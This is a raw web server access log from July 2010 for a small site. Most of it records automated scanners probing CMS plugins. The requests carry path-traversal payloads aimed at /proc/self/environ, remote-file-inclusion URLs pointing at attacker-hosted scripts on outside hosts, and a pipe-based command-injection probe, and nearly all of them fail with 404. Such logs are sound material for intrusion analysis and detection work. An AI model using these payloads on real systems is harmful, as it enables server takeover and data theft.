72.55.153.180 - - [23/Jul/2010:22:01:27 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.allattitudedoxies.com"
72.55.153.180 - - [23/Jul/2010:22:01:27 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.allattitudedoxies.com"
72.55.153.180 - - [23/Jul/2010:22:01:28 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.allattitudedoxies.com"
72.55.153.180 - - [23/Jul/2010:22:01:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.allattitudedoxies.com"
72.55.153.180 - - [23/Jul/2010:22:01:28 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.allattitudedoxies.com"
88.198.183.48 - - [23/Jul/2010:22:06:38 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.allattitudedoxies.com"
88.198.183.48 - - [23/Jul/2010:22:06:38 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.allattitudedoxies.com"
88.198.183.48 - - [23/Jul/2010:22:06:38 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.allattitudedoxies.com"
88.198.183.48 - - [23/Jul/2010:22:06:42 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.allattitudedoxies.com"
88.198.183.48 - - [23/Jul/2010:22:06:42 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.allattitudedoxies.com"
88.198.183.48 - - [23/Jul/2010:22:06:42 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.allattitudedoxies.com"
88.198.183.48 - - [23/Jul/2010:22:06:42 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.allattitudedoxies.com"
88.198.183.48 - - [23/Jul/2010:22:06:43 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.allattitudedoxies.com"
88.198.183.48 - - [23/Jul/2010:22:06:43 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.allattitudedoxies.com"
72.55.153.180 - - [23/Jul/2010:22:07:28 -0700] "GET /logs/access_100702.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.allattitudedoxies.com"
72.55.153.180 - - [23/Jul/2010:22:07:29 -0700] "GET /logs/access_100702.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.allattitudedoxies.com"
72.55.153.180 - - [23/Jul/2010:22:07:29 -0700] "GET /logs/access_100702.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.allattitudedoxies.com"
88.198.183.48 - - [23/Jul/2010:22:14:07 -0700] "GET /logs/access_100702.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.allattitudedoxies.com"
88.198.183.48 - - [23/Jul/2010:22:14:07 -0700] "GET /logs/access_100702.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.allattitudedoxies.com"
88.198.183.48 - - [23/Jul/2010:22:14:07 -0700] "GET /logs/access_100702.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.allattitudedoxies.com"
119.192.156.86 - - [23/Jul/2010:22:24:26 -0700] "GET /com_rwcards/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.192.156.86 - - [23/Jul/2010:22:24:26 -0700] "GET /logs//com_rwcards/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.192.156.86 - - [23/Jul/2010:22:24:26 -0700] "GET /logs/access.log%20%20//com_rwcards/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
83.16.100.218 - - [23/Jul/2010:22:26:16 -0700] "GET /logs/access_100709.log/errors.php?error=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.192.156.86 - - [23/Jul/2010:22:27:37 -0700] "GET /logs/access.log//com_rwcards/errors.php?error=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
207.46.13.40 - - [23/Jul/2010:22:29:47 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "allattitudedoxies.com"
207.46.13.40 - - [23/Jul/2010:22:32:57 -0700] "GET /?D=A HTTP/1.1" 200 924 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "allattitudedoxies.com"
67.195.111.244 - - [23/Jul/2010:22:46:25 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "allattitudedoxies.com"
77.88.25.28 - - [23/Jul/2010:22:50:06 -0700] "GET / HTTP/1.1" 200 924 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.allattitudedoxies.com"
88.191.228.166 - - [23/Jul/2010:23:57:49 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.allattitudedoxies.com"
88.191.228.166 - - [23/Jul/2010:23:57:49 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.allattitudedoxies.com"
88.191.228.166 - - [24/Jul/2010:00:10:30 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.allattitudedoxies.com"
88.191.228.166 - - [24/Jul/2010:00:10:30 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.allattitudedoxies.com"
88.191.228.166 - - [24/Jul/2010:00:10:30 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.allattitudedoxies.com"
88.191.228.166 - - [24/Jul/2010:00:10:33 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.allattitudedoxies.com"
88.191.228.166 - - [24/Jul/2010:00:10:33 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.allattitudedoxies.com"
88.191.228.166 - - [24/Jul/2010:00:10:33 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.allattitudedoxies.com"
207.46.204.177 - - [24/Jul/2010:00:20:45 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.allattitudedoxies.com"
207.46.204.177 - - [24/Jul/2010:00:21:26 -0700] "GET / HTTP/1.1" 200 924 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.allattitudedoxies.com"
88.191.228.166 - - [24/Jul/2010:00:30:35 -0700] "GET /logs/access_100702.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.allattitudedoxies.com"
88.191.228.166 - - [24/Jul/2010:00:31:34 -0700] "GET /logs/access_100702.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.allattitudedoxies.com"
119.254.229.63 - - [24/Jul/2010:00:48:43 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gendeng.webs.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.254.229.63 - - [24/Jul/2010:00:48:43 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gendeng.webs.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.254.229.63 - - [24/Jul/2010:00:48:44 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gendeng.webs.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.254.229.63 - - [24/Jul/2010:00:48:45 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.254.229.63 - - [24/Jul/2010:00:48:45 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
87.229.26.122 - - [24/Jul/2010:00:54:04 -0700] "GET /skin/zero_vote/error.php?dir=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
87.229.26.122 - - [24/Jul/2010:00:54:04 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
87.229.26.122 - - [24/Jul/2010:00:54:04 -0700] "GET /logs/access_100604.log//skin/zero_vote/error.php?dir=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
87.229.26.122 - - [24/Jul/2010:01:12:42 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
87.229.26.122 - - [24/Jul/2010:01:12:42 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
87.229.26.122 - - [24/Jul/2010:01:12:42 -0700] "GET /logs/access_100618.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
87.229.26.122 - - [24/Jul/2010:01:12:46 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
213.171.37.206 - - [24/Jul/2010:01:13:21 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "allattitudedoxies.com"
213.171.37.206 - - [24/Jul/2010:01:13:21 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "allattitudedoxies.com"
188.72.70.56 - - [24/Jul/2010:01:16:41 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.allattitudedoxies.com"
188.72.70.56 - - [24/Jul/2010:01:16:41 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.allattitudedoxies.com"
188.72.70.56 - - [24/Jul/2010:01:16:41 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.allattitudedoxies.com"
188.72.70.56 - - [24/Jul/2010:01:16:41 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.allattitudedoxies.com"
188.72.70.56 - - [24/Jul/2010:01:16:42 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.allattitudedoxies.com"
188.72.70.56 - - [24/Jul/2010:01:16:42 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.allattitudedoxies.com"
122.201.82.173 - - [24/Jul/2010:01:38:12 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.allattitudedoxies.com"
122.201.82.173 - - [24/Jul/2010:01:38:12 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.allattitudedoxies.com"
122.201.82.173 - - [24/Jul/2010:01:38:12 -0700] "GET /logs/access_100702.log//components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.allattitudedoxies.com"
119.254.229.63 - - [24/Jul/2010:01:39:26 -0700] "GET /logs/access_100709.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
122.201.82.173 - - [24/Jul/2010:01:39:31 -0700] "GET /logs/access_100702.log%20//components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.allattitudedoxies.com"
207.46.204.231 - - [24/Jul/2010:01:41:02 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.allattitudedoxies.com"
207.46.204.231 - - [24/Jul/2010:01:46:56 -0700] "GET / HTTP/1.1" 200 924 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.allattitudedoxies.com"
78.110.50.120 - - [24/Jul/2010:01:57:13 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gitct.kr/eng/.id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
78.110.50.120 - - [24/Jul/2010:01:57:13 -0700] "GET /logs/access_100604.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gitct.kr/eng/.id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
78.110.50.120 - - [24/Jul/2010:01:57:13 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gitct.kr/eng/.id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
67.195.112.61 - - [24/Jul/2010:01:57:22 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.allattitudedoxies.com"
67.195.112.61 - - [24/Jul/2010:01:57:22 -0700] "GET /logs/access_100528.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.allattitudedoxies.com"
119.254.229.63 - - [24/Jul/2010:02:00:41 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gendeng.webs.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.allattitudedoxies.com"
119.235.24.251 - - [24/Jul/2010:02:02:52 -0700] "GET /logs/access_100610.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fileden.com/files/2010/7/13/2913260/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.235.24.251 - - [24/Jul/2010:02:02:52 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fileden.com/files/2010/7/13/2913260/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.235.24.251 - - [24/Jul/2010:02:02:52 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fileden.com/files/2010/7/13/2913260/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
87.229.26.132 - - [24/Jul/2010:02:15:51 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://esuga.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.allattitudedoxies.com"
87.229.26.132 - - [24/Jul/2010:02:15:51 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://esuga.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.allattitudedoxies.com"
87.229.26.132 - - [24/Jul/2010:02:15:51 -0700] "GET /logs/access_100618.log/components/com_performs/performs.php?mosConfig_absolute_path=http://esuga.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.allattitudedoxies.com"
87.229.26.132 - - [24/Jul/2010:02:17:08 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://esuga.fileave.com/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.allattitudedoxies.com"
87.229.26.132 - - [24/Jul/2010:02:17:21 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.allattitudedoxies.com"
87.229.26.132 - - [24/Jul/2010:02:17:22 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tempat-respon-dan-spreader.com/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.allattitudedoxies.com"
119.235.24.251 - - [24/Jul/2010:02:20:26 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fileden.com/files/2010/7/13/2913260/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.235.24.251 - - [24/Jul/2010:02:20:29 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fileden.com/files/2010/7/13/2913260/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.235.24.251 - - [24/Jul/2010:02:21:05 -0700] "GET /logs/access_100610.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fileden.com/files/2010/7/13/2913260/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.235.24.251 - - [24/Jul/2010:02:21:08 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fileden.com/files/2010/7/13/2913260/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.235.24.251 - - [24/Jul/2010:02:21:12 -0700] "GET /logs/access_100604.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fileden.com/files/2010/7/13/2913260/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.235.24.251 - - [24/Jul/2010:02:21:20 -0700] "GET /logs/access_100604.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fileden.com/files/2010/7/13/2913260/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
89.252.20.60 - - [24/Jul/2010:02:33:14 -0700] "GET /logs/access_100618.log HTTP/1.0" 404 - "http://freecrack.pl.ua/index.php?do=cat&category=klipart" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]" "www.allattitudedoxies.com"
89.252.20.60 - - [24/Jul/2010:02:33:14 -0700] "GET / HTTP/1.0" 200 908 "http://www.allattitudedoxies.com/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]" "www.allattitudedoxies.com"
222.236.47.182 - - [24/Jul/2010:02:37:30 -0700] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.236.47.182 - - [24/Jul/2010:02:37:30 -0700] "GET /logs/access_100610.log////skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.236.47.182 - - [24/Jul/2010:02:37:32 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
79.244.120.116 - - [24/Jul/2010:02:46:26 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.susin.org/homepage/sub/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
79.244.120.116 - - [24/Jul/2010:02:46:26 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.susin.org/homepage/sub/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
79.244.120.116 - - [24/Jul/2010:02:46:26 -0700] "GET /logs/access_100618.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.susin.org/homepage/sub/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
79.244.120.116 - - [24/Jul/2010:02:46:35 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.susin.org/homepage/sub/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
174.142.75.205 - - [24/Jul/2010:02:49:07 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.allattitudedoxies.com"
174.142.75.205 - - [24/Jul/2010:02:49:07 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.allattitudedoxies.com"
174.142.75.205 - - [24/Jul/2010:02:49:07 -0700] "GET /logs/access_100702.log//components/com_simpleboard/image_upload.php?sbp=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.allattitudedoxies.com"
69.59.21.119 - - [24/Jul/2010:02:55:47 -0700] "GET /logs/access.log//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
69.59.21.119 - - [24/Jul/2010:02:55:47 -0700] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
69.59.21.119 - - [24/Jul/2010:02:55:47 -0700] "GET /joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
69.59.21.119 - - [24/Jul/2010:02:55:50 -0700] "GET /joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
69.59.21.119 - - [24/Jul/2010:02:55:50 -0700] "GET /logs/access.log//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
69.59.21.119 - - [24/Jul/2010:02:55:52 -0700] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
69.59.21.119 - - [24/Jul/2010:02:56:11 -0700] "GET /logs/access_100610.log//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
89.108.64.232 - - [24/Jul/2010:02:56:19 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.allattitudedoxies.com"
69.59.21.119 - - [24/Jul/2010:02:56:21 -0700] "GET /logs/access_100610.log//joomla/components/com_extcalendar/admin_events.php=http://www.regencychurch.org/as.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
79.244.120.116 - - [24/Jul/2010:03:03:14 -0700] "GET /skin/zero_vote/error.php?dir=http://www.susin.org/homepage/sub/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
79.244.120.116 - - [24/Jul/2010:03:03:24 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.susin.org/homepage/sub/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
79.244.120.116 - - [24/Jul/2010:03:03:24 -0700] "GET /logs/access_100604.log//skin/zero_vote/error.php?dir=http://www.susin.org/homepage/sub/a??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
119.235.24.251 - - [24/Jul/2010:03:05:37 -0700] "GET /logs/access_100604.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.fileden.com/files/2010/7/13/2913260/respon1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
222.236.47.182 - - [24/Jul/2010:03:05:43 -0700] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.allattitudedoxies.com"
